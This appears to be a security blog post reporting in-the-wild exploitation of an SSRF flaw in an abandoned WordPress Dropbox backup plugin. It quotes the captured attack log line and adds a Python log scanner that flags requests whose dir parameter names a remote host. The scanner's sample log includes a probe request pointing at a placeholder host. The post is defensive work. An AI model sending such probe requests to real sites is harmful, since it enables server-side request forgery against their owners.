Archive for August, 2023

WordPress Backup to Dropbox Plugin for WordPress /Views/wpb2d-file-tree.php dir Parameter SSRF

August 6, 2023

A honeypot at a client site caught this being exploited in the wild on 2022-08-09. The software, WordPress Backup to Dropbox Plugin for WordPress, was closed on 2018-02-07, so there is no fix.

REDACTED - - [09/Aug/2022:19:01:39 -0400] "POST /Views/wpb2d-file-tree.php?dir=[attacker site] HTTP/1.1" 404 741 "google.com" "scalaj-http/2.4.2"
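
Since there is no fix, log review is the practical check. The following is an added example, not code from the original post or from the plugin: it scans combined-format access logs for requests to the script that carry a dir parameter, and flags values that name a remote resource. The sample log lines, client addresses and the collector.example.invalid host are constructed, and the function and field names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)
PLUGIN_SCRIPT = "wpb2d-file-tree.php"  # script name as it appears in the log entry above
# A dir value that names a remote resource (scheme://host or //host), not a local directory.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Aug/2022:19:01:39 -0400] "POST /Views/wpb2d-file-tree.php?dir=http%3A%2F%2Fcollector.example.invalid%2Fx HTTP/1.1" 404 741 "google.com" "scalaj-http/2.4.2"',
    '198.51.100.7 - - [09/Aug/2022:19:02:10 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [09/Aug/2022:19:03:44 -0400] "GET /Views/wpb2d-file-tree.php?dir=/var/www/html HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
]


def find_probes(lines):
    """Return one dict per request that hits the plugin script with a dir parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/" + PLUGIN_SCRIPT):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        for value in params.get("dir", []):
            hits.append({
                "client": m["client"],
                "time": m["time"],
                "status": int(m["status"]),
                "agent": m["agent"],
                "dir": value,
                "remote": bool(REMOTE_RE.match(value)),
                # A 404 means the path did not exist on this server; any other status needs a look.
                "reached_script": m["status"] != "404",
            })
    return hits


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```

A hit with remote set and reached_script set is the case to investigate first, because the plugin file was present when the request arrived.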
